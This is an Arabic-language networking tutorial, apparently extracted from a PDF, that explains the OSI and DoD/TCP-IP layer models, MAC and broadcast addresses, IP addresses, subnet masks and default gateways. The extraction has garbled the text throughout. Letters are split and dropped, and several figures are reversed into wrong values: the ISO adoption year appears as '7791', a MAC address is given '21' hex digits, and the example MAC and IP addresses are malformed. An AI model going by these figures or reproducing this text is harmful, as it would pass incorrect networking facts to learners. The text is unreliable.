‫‪                                                                  .::::.::::OSI‬‬ ‫عند الرغبة في انشاء شبكة لتبادل المعلومات والبیانات فانه لبد من ان تكون‪ ‬‬ ‫الجھ زة متوافقة في طريقة التصال الشبكي‪                               .‬‬ ‫لذلك في عام ‪ 7791‬المنظمة الدولیة للمقايیس ‪       ( ISO ) International‬‬ ‫‪Organization for Standardization‬تبنت نموذج ال ‪            Open System‬‬ ‫‪                                                  . ) Interconnection (OSI‬‬ ‫ويتك ّن نموذج ‪ OSI‬من سبع طبقات ُتیح للدارس فھم مختلف الوظائف‪        ‬‬ ‫و‪                                       ‬‬ ‫ت‬ ‫والعملیات في الشبكة‪ ،‬والھم من ذلك أن ھذا النموذج ُشكل ُنی ً لفھم آلیة‬ ‫ي‪           ‬‬ ‫بة‬ ‫انتقال المعلومات في الشبكة‪ ،‬إضافة إلى إمكان استخدامه لتمثیل آلیة انتقال‬ ‫المعلومات ( ‪ (information‬أو ُ َم البیانات (‪ (data packets‬من البرامج‪         ‬‬ ‫حز‪                                             ‬‬ ‫التطبیقیة (مثل‪ :‬برامج الجداول اللكترونیة أو برامج معالجة الكلمات) عبر وسط‬ ‫النقل في الشبكة (مثل‪ :‬السلك‪                                           ‬‬ ‫(( ‪ (wires‬إلى برنامج تطبیقي على كمبیوتر آخر على شبكة ما‪ ،‬حتى إن‪      ‬‬ ‫اختلف نوع شبكة ال ُرسل عن نوع شبكة ال ُستقبل ‪                       .‬‬ ‫م‪                               ‬‬ ‫م‬ ‫يمكننا تعريف الھدف من انشاء ال ‪ OSI‬بانه يستخدم لتقسیم المھام الكثیرة‪  ‬‬ ‫التي يتطلبھ ا نقل البیانات من كمبیوتر الي اخر ‪.‬الي خطوات صغیرة‪           .‬‬ ‫ھذه الخطوات الصغیر ة تسمي ال ‪ layers‬او الطبقات ‪ ,‬وال ‪ OSI‬يتكون من‪    ‬‬ ‫سبعة طبقات‪                                                               .‬‬ ‫لكل طبقة مسئوولیاتھا الخاصة بھا‪                                         .‬‬ ‫الطبقات السبعة ھي‪                                                       :‬‬ ‫‪                                                              1/ Application‬‬ ‫‪                                                           2 / Presentation‬‬ ‫‪                                                                 3/ Session‬‬ ‫‪                                    79‬‬ ‫‪                                                                   4/ Transport‬‬ ‫‪                                                                     5/ Network‬‬ ‫‪                                                                    6/ Data­link‬‬ ‫‪                                                                     7/ Physical‬‬ ‫نموذج ال ‪ OSI‬ھو طريقة التقسیم لنواع البیانات المتصلة بطريقة تساعد‪      ‬‬ ‫‪Network Administrator‬مدير الشبكة في معالجة مشاكل الشبكة‪          .‬‬ ‫مسئولیة كل طبقة‪                                                            :‬‬ ‫في اثناء مرور البیانات علي الطبقات السبعة في الشبكة ‪ ,‬كل طبقة تضع‪     ‬‬ ‫معلومات بسیطة تسمي ‪ Header‬علي الحزمة ‪                               .‬‬ ‫طیب الن ح نلقي نظرة سريعة علي مھمة كل تطبیق‪                        :‬‬ ‫‪                                                    1/ The Application Layer‬‬ ‫طبقة التطبیق او البرنامج‪                                                      :‬‬ ‫اعلي طبقة في نموذج ال ‪ OSI‬الھدف من طبقة التطبیق ھو ادارة التصالت‪   ‬‬ ‫بین التطبیقات ‪ .‬تطبیقات او برامج طبقة التطبیق ھ ي برامج معیارية او قیاسیة‪ ‬‬ ‫تتفاعل مع البرنامج الجاري في الشبكة ‪ .‬لتفسیر ذلك عندك المبرمج اللي‪    ‬‬ ‫كتب برنامج ‪ Word‬كتبه بحیث يتفاعل مع البرامج القیاسیة الموجودة في طبقة‬ ‫التطبیق ‪ .‬برنامج ‪ Word‬يستخدم برامج الشبكة القیاسیة لیقوم ب ‪    save ,‬‬ ‫‪copy , delete‬للمجلدات والمستندات‪                                          .‬‬ ‫طبقة التطبیق ھي التي تستقبل فیھا البرامج البیانات وتطلبھا ايضا ‪          .‬‬ ‫كل الطبقات الخري تعمل لھذه الطبقة‪                                         .‬‬ ‫‪                                                  2/ The Presentation Layer‬‬ ‫طبقة التقديم‪                                                                   :‬‬


‫طبقة التقديم تلي طبقة التطبیق مباشرة واعلي طبقة الجلسة‪              .‬‬ ‫طبقة التقديم تضیف ھیكل لحزم البیانات التي يتم تبادلھا‪                     .‬‬ ‫مھمة طبقة التقديم الرئیسیة ھي التاكد من الرسالة التي ارسلت بلغة او رمز‬ ‫‪                                       89‬‬ ‫يستطیع الكمبیوتر المستقبل ان يفھمھا ‪                                      ً .‬‬ ‫البروتوكولت في طبقة التقديم يحتمل تقوم بترجمة البیانات الي رموز مفھومة‪ ‬‬ ‫بعد ذلك تضغطھا ويحتمل تشفیرھا قبل ان ترسل الي طبقة ‪ Session‬او‪        ‬‬ ‫الجلسة التي تلیھا‪                                                              .‬‬ ‫‪                                                           3/ The Session Layer‬‬ ‫طبقة الجلسة‪                                                                   :‬‬ ‫تلي طبقة التقديم ‪ .‬تتحكم في الحوار اثناء التصالت ‪ .‬وتدير الجلسات بین‪     ‬‬ ‫الطراف المتصلة ‪ .‬بروتوكولتھ ا تغطي مواضیع مثل كیفیة انشاء اتصال ‪ ,‬كیفیة‪ ‬‬ ‫استخدامه ‪ ,‬وكیف يفصل التصال عندما تكتمل الجلسة ‪                       .‬‬ ‫عندما يبدا التصال تقوم طبقة الجلسة بمراجعة الخطاء المرسلة‪              .‬‬ ‫تضیف معلومات مسیطرة علي حزمة البیانات في اثناء تبادل البیانات‪           .‬‬ ‫‪                                                       4/ The Transport Layer‬‬ ‫طبقة النقل‪                                                                      :‬‬ ‫تضمن الحزم التي تصل‪                                                          .‬‬ ‫توسس للتصال وترسل تقارير بوصول الحزم‪                                    .‬‬ ‫بروتوكولت ھ ذا التصمیم تمد بوسائل تاسیس ‪ ,‬معالجة ‪ ,‬واطلق التصالت‪    ‬‬ ‫للجھ زة المشتركة في التصال‪                                                 ..‬‬ ‫‪                                                         5/ The Network Layer‬‬ ‫طبقة الشبكة‪                                                                    :‬‬ ‫مسئولة عن تمرير البیانات بناء علي عناوينھا المنطقیة‪                         .‬‬ ‫تجزئ وتعید تجمیع الحزم اذا كان ضروريا‪                                         .‬‬ ‫تحرك الحزم من مصدرھا الي وجھتھا خلل الشبكات‪                            .‬‬ ‫‪                                                       6/ The Data­ Link Layer‬‬ ‫طبقة ربط البیانات‪                                                                :‬‬ ‫يتم فیھا تجھیز البیانات لیتم اخیرا تسلیمھا للشبكة‪                             .‬‬ ‫يتم تغلیف الحزم في اطار ( وھ و مصطلح يستخدم ل وصف حزم البیانات الثنائیة‬ ‫‪                                         99‬‬ ‫‪(binary data ( .‬البروتوكولت في ھذه الطبقة تساعد في عنونة واكتشاف‪     ‬‬ ‫اخطاء البیانات التي ستحول ‪                                                  .‬‬ ‫تتكون طبقة ربط البیانات من طبقتین ثانويات ‪ :‬الولي ‪    Logical Link Control‬‬ ‫( ‪ (LLC‬او وصلة السیطرة المنطقیة ‪ .‬والثانیة ‪Media Access Control (MAC ( .‬‬ ‫كل طبقة ثانوية تقدم خدماتھا الخاصة ‪                                         .‬‬ ‫‪LLC‬تمثل واجھ ة بین بروتوكولت طبقة الشبكة وطريقة دخول المیديا ‪ ,‬مثال‪    ‬‬ ‫‪Ethernet‬او ‪                                                     Token Ring .‬‬ ‫‪ MAC‬تعالج التصال مع المیديا الفیزيائیة او توصیلت الشبكة الفیزيائیة مثل‪     ‬‬ ‫‪twisted­pair‬او‪                                               coaxial cabling .‬‬ ‫‪                                                         7/ The Physical Laye‬‬ ‫الطبقة المادية ‪                                                                :‬‬ ‫ھي اخر طبقة في نموذج ال ‪ OSI‬وتقوم بتحديد كیفیة ارسال واستقبال قطع‪   ‬‬ ‫البیانات المتحركة في اسلك الشبكة‪                                          .‬‬ ‫يعمل ھ ذا التطبیق في المنطقة الساخنة من العملیة كلھا ‪ ,‬اذ يضع قطع‪       ‬‬ ‫البیانات في السلك وياخذھا منھا ‪ ,‬وھ نا يمكننا ان نتحدث عن البیانات ك‪      ‬‬ ‫شرائح وحزم‪                                                                   .‬‬ ‫والن‪ ..‬كیف يعمل نموذج‪                                                 OSI :‬‬ ‫تخلیق وتصنیع الحزم ‪ packets‬يبدا في قمة نموذج ال ‪ OSI .‬طبقة التطبیق‪     ‬‬ ‫تاخذ البیانات التي سترسل وتمررھا الي السفل الي طبقة التقديم حیث‪      ‬‬


‫توضع علیھا ‪ header‬او معلومات جديدة ‪ .‬طبقة التقديم تمرر حزمة البیانات الي‪ ‬‬ ‫اسفل ‪ ,‬وبنفس الطريقة يقوم كل تطبیق بوضع معلوماته علي حزمة البیانات‪    ‬‬ ‫حتي تسلم في النھ اية الي الطبقة المادية‪                                    .‬‬ ‫يقوم التطبیق المادي ‪ physical layer‬بتقسیم الحزم علي اسلك الشبكة ‪    ,‬‬ ‫وتستمر البیانات في طريقھا الي وجھتھا‪                                       .‬‬ ‫في مكان الوصول ‪ ,‬حزم البیانات تتحرك في اتجاه معاكس ‪ ,‬من اسفل النموذج‪ ‬‬ ‫الي العلي ‪                                                                   .‬‬ ‫التطبیق المادي في وجھ ة حزمة البروتوكول يقوم باخذ الحزمة خارج اسلك‪     ‬‬ ‫الشبكة ويمررھ ا الي العلي الي طبقة ربط البیانات ‪ .‬طبقة ربط البیانات تختبر‪  ‬‬ ‫معلومات الحزمة التي وضعتھ ا طبقة ربط البیانات علي الحزمة ‪ .‬اذا لم تكن ھذه‬ ‫وجھ ة الحزمة فان الحزمة يتم اعدامھا ‪ .‬اما اذا كانت ھذه وجھة الحزمة تقوم‪    ‬‬ ‫‪                                       001‬‬ ‫بروتوكولت تطبیق ربط البیانات بنزع ‪ header‬طبقة التطبیق التي ارسلت مع‬ ‫الحزمة وتمرركل الحزمة الي العلي الي طبقة الشبكة‪                   .‬‬ ‫ويتكرر ھ ذا في كل طبقة حتي تصل البیانات الي قمة النموذج ‪            .‬‬ ‫بھ ذه الطريقة اي تطبیق من الكمبیوتر المرسل يتصل مع نفس التطبیق من‬ ‫الكمبیوتر المستقبل ‪ .‬وتسمي ھذه اتصالت طبقة النظیر ‪      peer­layer‬‬ ‫‪                                                    . communication‬‬ ‫نموذج‪                                                        DoD :‬‬ ‫حزمة ال ‪ TCP/IP‬تم تطويرھ ا قبل ان ينشر حتي نموذج ال‪            OSI .‬‬ ‫نتیجة لذلك فان حزمة ‪ TCP/IP‬ل تستخدم نموذج ال ‪ OSI‬كمرجع ‪         .‬‬ ‫‪ TCP/IP‬تم تطويره باستخدام نموذج ال ( ‪Department of Defense ( DoD‬‬ ‫كمرجع ‪                                                            .‬‬ ‫لكن مھم جدا انك تتعامل مع ال ‪ OSI‬والسبب ان ال ‪ OSI‬يستخدم للمقارنة‬ ‫‪                                101‬‬ ‫بین حزمة ‪ TCP/IP‬وباقي حزم البروتوكولت ‪                                 .‬‬ ‫علي خلف نموذج ال ‪ OSI‬يحتوي نموذج ال ‪ DoD‬علي اربعة طبقات‪           .‬‬ ‫مع ذلك يقوم نموذج ال ‪ DoD‬بمعالجة البیانات بنفس الطريقة التي يعالج بھا‪   ‬‬ ‫نموذج ال ‪ OSI‬نفس البیانات ‪ .‬فقط الختلف في عدد مراحل معالجة البیانات‪ .‬‬ ‫طبقات نموذج ال ‪ DoD‬او وزارة الدفاع‪                                        :‬‬ ‫‪1/ Application‬يغطي نفس المھام ل التطبیق ‪ +‬التقديم ‪ +‬الجلسة في‪     ‬‬ ‫نموذج‪                                                                 OSI .‬‬ ‫‪2/ Transport‬يغطي نفس مھام طبقة النقل في‪                        OSI .‬‬ ‫‪3/ Internet‬يغطي نفس مھام طبقة الشبكة في‪                       OSI .‬‬ ‫‪4/ Network Interface Layer‬يغطي نفس مھام طبقة ربط البیانات ‪ +‬المادية‪.‬‬ ‫الدروس القادمة سیكون فیھا تفصیل عمل كل طبقة علي حدة ‪               .‬‬ ‫الجدول التالي يوضح مقارنة بین النموذجین وكیف ان ال ‪ DoD‬اختصر كثیر من‪  ‬‬ ‫مھام ال ‪ OSI‬في تصمیمه‪                                                    .‬‬ ‫‪                                    201‬‬ ‫مصطلحات ھامـــــــــــــــة‪                                                 ‬‬ ‫‪                  )International Organization for Standardization (ISO‬‬ ‫المنظمة الدولیة للمقايیس‪                                               :‬‬ ‫المنظمة التي صدقت علي نموذج ال‪                                OSI .‬‬ ‫‪                             )Open System Interconnection model (OSI‬‬ ‫النموذج المرجعي للشبكات‪                                               ‬‬ ‫نموذج الطبقات السبعة المستخدم في تقسیم المھام التي يحتاج الیھا‪     ‬‬ ‫لتحريك البیانات من كمبیوتر الي اخر‪                                      .‬‬ ‫‪                                                                        Layer‬‬ ‫الطبقة‪                                                                       :‬‬ ‫جزء من ال ‪ OSI‬ويقوم بتنظیم المھ ام بین البروتوكولت المختلفة حتي ل يحدث‬


‫تعارض او نقص في عملھا‪                                                .‬‬ ‫‪                                          )Department of Defense (DoD‬‬ ‫وزارة الدفاع ( المیركیة طبعا)‪                                             ‬‬ ‫‪                                             Peer­layer Communication‬‬ ‫اتصالت طبقة النظیر‪                                                       :‬‬ ‫نوع من التصالت فیھ ا اي تطبیق من الكمبیوتر المرسل يتصل مع نفس‪      ‬‬ ‫التطبیق في الكمبیوتر المستقبل‪                                         .‬‬ ‫‪                                  301‬‬ ‫بروتوكول ‪) TCP/IP‬الجزء الخامس ‪              )-1-‬‬ ‫للكاتب‪                                                   AgainstISR&USA :‬‬ ‫‪                                                The Network Interface Layer‬‬ ‫طبقة واجھ ة الشبكة وطبقة عنوان النترنت وطريق الحزم ‪ .‬ھذه الطبقات‪      ‬‬ ‫تتفاعل مع الشبكة بتعريف كیفیة حركة الحزم من والي الشبكة ‪ .‬كما عرفنا‪   ‬‬ ‫سابقا البروتوكولت تضع معلومات صغیرة علي الحزم مثلما توضع الديباجات‪    ‬‬ ‫علي الطرود التي سترسل عبر البريد‪                                         .‬‬ ‫طبقة واجھة الشبكة‪                                                          ‬‬ ‫‪                                               The Network Interface Layer‬‬ ‫ادني طبقة في كتلة ال ‪ TCP/IP‬ھي ال ‪ Network Interface Layer‬او طبقة‪  ‬‬ ‫واجھة الشبكة‪                                                                .‬‬ ‫المسئولیة الرئیسیة ل طبقة واجھة الشبكة ھ ي تعريف كیفیة اتصال كمبیوتر‪ ‬‬ ‫مع الشبكة‪                                                                   .‬‬ ‫ھذا اھم جزء في عملیة استلم البیانات‪                                      ‬‬ ‫الكمبیوتر يجب ان يتبع قواعد ارسال واستقبال البیانات قیاسا الي طبیعة‪      ‬‬ ‫تركیب الشبكة ‪                                                               .‬‬ ‫ھناك طريق واحد لتعرف كیف يتفاعل الكمبیوتر مع طبقة الشبكة حتي‪        ‬‬ ‫تستطیع ان تقارنھا مع مثال واقعي‪                                            .‬‬ ‫مثال ‪ ::‬لنفرض انك سترسل كرت تمني بالشفاء وكیكة شیكولته لحد‪        ‬‬ ‫اصدقاءك في المستشفي‪                                                     .‬‬ ‫اول خطوة انت مسؤول من تجھیز الشیاء التي سترسلھا كتغلیفھا بمظھر حلو‬ ‫ثم كتابة عنوان علیھا‪                                                         .‬‬ ‫حتي ھنا انت عملت اللي علیك‪                                              .‬‬ ‫الخطوة التانیة ھي تمريرھ ا لنظام تسلیم اخر له اجراءاته الخاصة به‪          .‬‬ ‫يمكنك ان تستخدم أي شركة خدمات سريعة لتوصیل المغلف ‪ .‬كما يجب ان‪  ‬‬ ‫‪                                     401‬‬ ‫تتبع القواعد التي تتعامل بھا الشركة مع زبائنھ ا ‪ ,‬مثال كیفیة كتابة العنوان ‪    ,‬‬ ‫كیفیة الدفع للموظف المسئول ‪ ,‬عنوان ضمان المغلف ( في حالة رجوعه)‪       .‬‬ ‫بعد ان يصل الي صديقي المغلف مش حیھتم بكیفیة وصوله الیه فقط حیكون‪   ‬‬ ‫سعید بالھداء‪                                                                 .‬‬ ‫طبقة الشبكة تشبه قسم الستقبال في المستشفي ‪ .‬الموظفین فیھا‪         ‬‬ ‫يستقبلوا كثیر من الشیاء المرسلة لمن في المستشفي ويجب ان يقرروا ما‪  ‬‬ ‫سیرسل منھ ا للمرضي ‪ .‬بعد ان يروا بان ھ ديتك معنونة بصورة صحیحة ‪ ,‬يقوموا‬ ‫بتمريرھا الي صديقك ‪ .‬سیقوم ھو بفك الھدية لیاكل الكیكة ويقرا الكارت‪         ‬‬ ‫المرفق معھا‪                                                                   .‬‬ ‫ما ستقوم به طبقة الشبكة في كمبیوتر موصول بشبكة مشابه لما ستقوم به‪ ‬‬ ‫انت مع خدمة ارسال الھدية كشركة‪                                            .‬‬ ‫طبقة واجھة الشبكة تستخدم لستقبال حزم البیانات ولرسالھا ‪ .‬عند وصول‪   ‬‬ ‫الحزمة بواسطة كرت الشبكة ‪ ,‬تقوم طبقة الشبكة بتمثیل دور قسم الستقبال‬ ‫في المستشفي وتقرر تمرير الحزمة الي كتلة او حزمة البروتوكول لمعالجتھا‪   ‬‬ ‫علي عنوان العتاد او ‪                                       Hardware address .‬‬ ‫في حال تم تجھ یز الحزمة بواسطة كتلة البرتوكول يتم تمريرھا في النھاية الي‪ ‬‬


‫طبقة الشبكة لتوضع في الشبكة‪                                               .‬‬ ‫في تطبیق واجھ ة الشبكة المعلومات المرفقة مع الحزمة ‪ Header‬والتي‪         ‬‬ ‫تحتوي علي معلومات عنوان الحزمة‪                                             .‬‬ ‫ضمن معلومات الحزمة ھناك عنوان اسمه ‪ hardware address‬او عنوان العتاد‪ .‬‬ ‫عنوان العتاد ‪                                                 Hardware Address‬‬ ‫مع أي حزمة من البیانات معلومات عنھا ‪ header‬تحتوي علي معلومات العنوان‪.‬‬ ‫ھذه المعلومات المرفقة تساعد الحزمة علي الوصول الي المكان الصحیح ‪      .‬‬ ‫معلومات العنوان ھ ذه تاتي من عنوان فیزيائي يطبع علي أي كارت شبكة‪        ‬‬ ‫عندما يصنع الكارت‪                                                             .‬‬ ‫ھذا العنوان لن يتغیر طالما يعمل الكارت‪                                         .‬‬ ‫يطلق علي ھ ذا العنوان أي من السماء التالیة‪                                 :‬‬ ‫‪                                                         1/ Hardware Address‬‬ ‫‪                                      2/ Media Access Control (MAC)address‬‬ ‫‪                                                           3/ Ethernet address‬‬ ‫‪                                                            4/ Physical address‬‬ ‫‪                                   5/ Network Interface Card (NIC)address‬‬ ‫‪                                        501‬‬ ‫عنوان ال ‪ hardware‬خاص بكل كروت الشبكات ايا كانت الشركة المصنعة ‪     .‬‬ ‫تتكون من ‪ 21‬رقم سداسي عشري ‪ hexadecimal‬في العنوان ‪ .‬وھو يشبه‪    ‬‬ ‫ھذا‪                                                                           :‬‬ ‫‪                                                         500:A0:C9:0F:92:A‬‬ ‫‪::‬اكثر ثلثة انظمة ترقیم مستخدمة في صناعة الكمبیوتر ھي ‪        binary ,‬‬ ‫‪                                                    . :: decimal, hexadecimal‬‬ ‫‪::‬يعد النظام العشري مناسب ُ بالنسبة للبشر ‪ ،‬بینما نظام العد الثنائي يعتبر‪   ‬‬ ‫ا‪                                                 ‬‬ ‫ب بالنسبة لللة ‪ ،‬ويعتبر نظام العد السادس عشر وسط أو توفیق ا‪         ‬‬ ‫مناس ً‬ ‫بینھما‪                                                                       ::‬‬ ‫اول ستة ارقام من ارقام ال ‪ hexadecimal‬توضح رقم التصنیع وھو خاص بمصنع‬ ‫كارت الشبكة‪                                                                .‬‬ ‫اخر ستة ارقام تشكل رقم تسلسلي خاص قام بتحديده مصنع كارت الشبكة‪ .‬‬ ‫ملحظة‪                                                                     ::‬‬ ‫لكي تحدث كل اتصالت ‪ TCP/IP ,‬الراسل للحزمة يجب ان يعرف عنوان‪         ‬‬ ‫‪hardware‬وجھة التسلیم‪                                                     .‬‬ ‫لكي تسلم حزمة ال ‪ TCP/IP‬يجب ان تحتوي علي عنوان ‪ hardware‬وجھة‪     ‬‬ ‫التسلیم‪                                                                      .‬‬ ‫في حال وصول الحزمة الي كارت الشبكة ‪ ,‬القسم من الحزمة الذي يحتوي‪    ‬‬ ‫عنوان ال ‪ hardware‬الھ دف ‪ ,‬يفحص لمعرفة ما اذا كانت الحزمة ھي المقصودة‬ ‫لذلك الجھاز ‪ .‬اذا كان عنوان ال ) ‪hardware‬كارت الشبكة الھدف) الھدف وافق‪ ‬‬ ‫كارت الشبكة المرسل او اذا كانت الحزمة مرسلة الي كل الجھزة بما يسمي‪ ‬‬ ‫بال ‪  Broadcast ,‬فان الحزمة تمرر الي كتلة البروتوكول ‪ TCP/IP‬للمعالجة ‪ .‬اذا‪  ‬‬ ‫كان عنوان ال ‪ hardware‬الھ دف مختلف بالنسبة للحزمة ‪ packets ,‬فان الحزمة‬ ‫تعدم او تنبذ ‪                                                                 .‬‬ ‫ارسال الحزم لعدة كمبیوترات مرة واحدة ‪                   Broadcast Packets‬‬ ‫أي حزمة يجب ان تكون معنونة للكمبیوتر ‪ .‬كما ذكرنا سابقا عندما تتحرك‪        ‬‬ ‫الحزمة خلل الشبكة ‪ ,‬كل كمبیوتر سیقوم بفحص أي حزمة لیعرف أي منھا‪    ‬‬ ‫معنون الي العنوان الخاص ب ‪ hardware‬الكمبیوتر ‪                            .‬‬ ‫‪::‬يعني بالبلدي كده الحزمة ماشیة في الشبكة كل واحد من الجھزة ياخد‪    ‬‬ ‫منھا اللي مرسل لیه وبس ويسیب الباقین لنھم لم يرسلوا له ‪ ::‬كده يمكن‪   ‬‬ ‫‪                                      601‬‬ ‫وضحت اكتر ‪                                                              .‬‬


‫لكن ھل يمكن للحزمة ‪ packet‬انھا ترسل لكل الجھزة في وقت واحد ؟‪       ‬‬ ‫الجابة ‪::‬نعم ‪                                                           ::‬‬ ‫حزمة البیانات يمكن ان ترسل الي كل الجھزة في الشبكة مرة واحدة ‪ .‬ھذا‪  ‬‬ ‫النوع يسمي ارسال حزمة لعدة اجھزة ‪ broadcast packet .‬ھذه الحزمة‪      ‬‬ ‫تحتوي علي عنوان مختلف عن عنوان الحزمة العادية المرسلة لجھاز واحد ‪   .‬‬ ‫شكله كالتالي‪                                        : FF:FF:FF:FF:FF:FF‬‬ ‫طبقة النترنت ‪                                         The Internet Layer‬‬ ‫طبقة النترنت تقع في نموذج ‪ TCP/IP‬بین طبقة واجھة الشبكة وطبقة النقل ‪.‬‬ ‫طبقة النترنت تحتوي علي البروتوكولت المسئولة من عنونة وتوجیه الحزم ‪  ,‬‬ ‫وھي تحتوي علي عدة برتوكولت ‪ protocols‬تشمل‪                        :‬‬ ‫‪                                               ::1/ Internet Protocol::IP‬‬ ‫‪                                  ::2/ Address Resolution Protocol ::ARP‬‬ ‫‪                          ::3/ Internet Control Message Protocol::ICMP‬‬ ‫‪                            4/ Internet Group Message Protocol ::IGMP‬‬ ‫‪                                   701‬‬ ‫بروتوكول ‪) TCP/IP‬الجزء الخامس ‪                  )-2-‬‬ ‫للكاتب‪                                                           AgainstISR&USA :‬‬ ‫طبقة النترنت‪                                                The Internet Layer‬‬ ‫طبقة النترنت تقع في نموذج ‪ TCP/IP‬بین طبقة واجهة الشبكة وطبقة النقل ‪                    .‬‬ ‫طبقة النترنت تحتوي علي البروتوكولت المسئولة من عنونة وتوجیه الحزم ‪ ,‬وهي تحتوي علي عدة‪ ‬‬ ‫برتوكولت ‪ protocols‬تشمل‪                                                              :‬‬ ‫‪                                                       ::1/ Internet Protocol::IP‬‬ ‫‪                                    ::2/ Address Resolution Protocol ::ARP‬‬ ‫‪                          ::3/ Internet Control Message Protocol::ICMP‬‬ ‫‪                          ::4/ Internet Group Message Protocol ::IGMP‬‬ ‫‪ -1‬بروتوكول النترنت‪                                        Internet Protocl::IP::‬‬ ‫بروتوكول النترنت هو البروتوكول الرئیسي في طبقة النترنت في كتلة ال ‪ TCP/IP .‬هذا‪        ‬‬ ‫البروتوكول مسئول من تحدید مصدر ووجهة ال ‪ IP address‬لي حزمة ‪                    .‬‬ ‫نجد ان عنوان بروتوكول النترنت ‪ IP address‬یطلق علي العنوان المنطقي ‪          logical‬‬ ‫‪ address‬هوالذي یقوم مدیر الشبكة بتخصیصه للكمبیوتر‪                                     .‬‬ ‫كل كمبیوتر في الشبكة له عنوان بروتوكول انترنت خاص به ‪                                    .‬‬ ‫مثال لل‪                                                                     IP address :‬‬ ‫‪                                                                        15.2.861.291‬‬ ‫**********‪                                                                          ‬‬ ‫‪.::‬اوكي شباب عاوز انبه علي حاجة هامة ‪ ,‬زي ما لحظتوا انا بكتب المصطلح وترجمته طیب كان‪ ‬‬ ‫ممكن اكتب الترجمة وانسي المصطلح الصلي ‪ ,‬لكن في عالم الواقع عندما تتعامل مع‪      ‬‬ ‫الجهزة ‪,‬‬ ‫وحتي اذا كان نظام التشغیل باللغة العربیة في اشیاء معینة انت ح تلقاها مكتوبة في صورة‬ ‫مصطلحاتها‬ ‫الصلیة ‪ .‬مثال ‪ IP address‬مش ممكن تلقاه مكتوب عنوان بروتوكول النترنت ابدا ال في‪     ‬‬ ‫مكان تاني غیر العدادات‪                                                                     .‬‬ ‫یبقي نتفق علي حاجة وهي المصطلح الثابت یعني مش كلمات النجلیزي العادیة‪ ,‬هي هامة لكل‪    ‬‬ ‫من‬ ‫یرید ان یطور نفسه ‪ ,,,‬وكل من یرید ان یتقدم في مجال تقني أي كان لماذا ؟ لنه اذا ظهر علم‪   ‬‬ ‫جدید‬ ‫‪                                              801‬‬ ‫وتكنلوجیا جدیدة في مجالك وانت ضعیف في اللغة النجلیزیة حتعرفها كیف !! تنتظر ترجمتها‪ ..‬اوك‬ ‫بعد كم من الزمن ستجد من یترجمها لك بصورة مقبولة ‪ ,‬یبقي في النهایة انسي ومش ح تتقدم‪   ‬‬ ‫ابدا ‪.‬‬ ‫طیب احنا محتاجین ایه الن‪ ,‬مش حاجة كثیرة حاجة واحدة وبس ‪ ,‬بعد ما اترجم المصطلح واكرره‪   ‬‬


‫عدة مرات مش حاستمر في كتابته بالعربي والنجلیزي ساكتفي فقط بكتابته باللغة النجلیزیة یعني‬ ‫اذا‬ ‫لقیت ‪ IP address‬تفهم علي طول ان ده عنوان النترنت وهي اختصار اخر للترجمة نفسها فهي‬ ‫اصل عنوان بروتوكول النترنت واختصارا نقول عنوان النترنت ‪ .‬و ح نبدا من عنوان النترنت‪   ‬‬ ‫ساسمیه في أي شروحات ‪  IP address .‬بدانا به لنه ستعتمد علیه كثیر من الدروس القادمة ‪   .‬‬ ‫‪                                                                                           .::‬‬ ‫**********‪                                                                           ‬‬ ‫هذا العنوان یخصص بواسطة المدیر للكمبیوتر ویجب ان یكون العنوان خاصا بالشبكة الموجود فیها‪.‬‬ ‫جزء من ال ‪ IP address‬یمثل الشبكة التي یوجد فیها الجهاز ‪ host ,‬والجزء الخر یمثل‪      ‬‬ ‫الجهاز نفسه الموجود علي تلك الشبكة ‪                                                          .‬‬ ‫‪::‬الشارع الذي تسكن فیه یشبه ال ‪ IP address .‬الخطاب الذي یرسل الیك سیسلم الي منزلك‪  ‬‬ ‫بسبب العنوان المنطقي ‪                                                                        .‬‬ ‫او یمكن ان نشبه الیمیل تبعك بال ‪ IP address .‬الرسالة تصلك لسبب رئیسي وهو ان مرسل‪  ‬‬ ‫الرسالة استخدم عنوانك الصحیح ‪ ,‬والنتیجة ان الرسالة ستصلك بالتاكید بسبب العنوان ‪               .‬‬ ‫اذا رحلت الي بیت اخر في شارع اخر عنوانك سیتغیر وخطاباتك سترسل الي العنوان الجدید ولكن‪   ‬‬ ‫الذي یسلم لك الخطابات هو نفسه‪                                                             . ::‬‬ ‫عندما تمرر ال ‪ Packet‬او حزمة البیانات الي كتلة ال ‪ TCP/IP‬یوضع عنوان الجهة المرسلة‪   ‬‬ ‫والجهة الهدف او المرسل الیها في ال ‪ header IP‬او معلومات ال ‪                         IP .‬‬ ‫ال ‪ IP‬یحدد هل الجهاز الهدف محلي ‪ Local‬ام بعید‪                                Remote .‬‬ ‫الهدف یكون ‪ local‬اذا ال ‪ IP‬ذكر ان الجهاز الهدف علي نفس الشبكة‪                            .‬‬ ‫الهدف یكون ‪ remote‬اذا ال ‪ IP‬ذكر ان الهدف في شبكة اخري‪                                .‬‬ ‫ال ‪ IP‬یقوم بتحدید نوع الجهاز الهدف او المستقبل بالعتماد علي ال ‪ IP address‬الموجود فیه‪ ‬‬ ‫وال ‪ Subnet Mask‬في الجهاز المرسل‪                                                     .‬‬ ‫تعریف ال ‪  Subnet Mask ::‬هو هذا الجزء مهم جد ً لنه یحدد هویة الشبكة ‪ ،‬ویستخدم في‪    ‬‬ ‫ا‪                                         ‬‬ ‫الشبكات الكبیرة عندما یقسم رقم ‪ IP‬واحد إلى عدة أقسام ویصبح كل رقم یمثل شبكة مستقلة‪    ‬‬ ‫ولكن‬ ‫تشترك كل هذه الشبكات بهویة واحدة یمثلها الـ ‪ Subnet Mask‬و الـ ‪ Subnet‬تعني التقسیم‪  ‬‬ ‫وهو الذي یحدد رقم الشبكة ورقم الجهاز ‪ ::.‬سنتعرف علیه بالتفصیل في الدروس القادمة‪           .‬‬ ‫‪                                               901‬‬ ‫تحدید وجهة البیانات محلیة ‪: local‬ام بعیدة ‪                                     remote :‬‬ ‫ال ‪ IP‬یحتاج الي تحدید كیف یوصل البیانات الي وجهتها‪                                       .‬‬ ‫اذا الجهة(الجهاز) عنوانها في شبكة محلیة ‪ TCP/IP‬یمكن ان یتصل مباشرة مع الجهاز المقصود‪  .‬‬ ‫اذا كان الجهاز في شبكة اخري او بعیدة فان ال ‪ TCP/IP‬یحتاج الي ارسال الحزمة من خلل ال‪   ‬‬ ‫‪                                                                 . Default Gateway‬‬ ‫تعریف ال ‪Default Gateway ::‬یسمي ایضا ‪ Router ,‬هو عنوان في الجهاز ‪   host‬‬ ‫علي الشبكة یقوم بتوفیر طریق خارج الشبكة المحلیة ‪ .‬بمعني اخر ‪ ,‬ال ‪   default gateway‬‬ ‫عبارة عن باب یساعد علي الدخول من خارج الشبكة‪                                       . ::.‬‬ 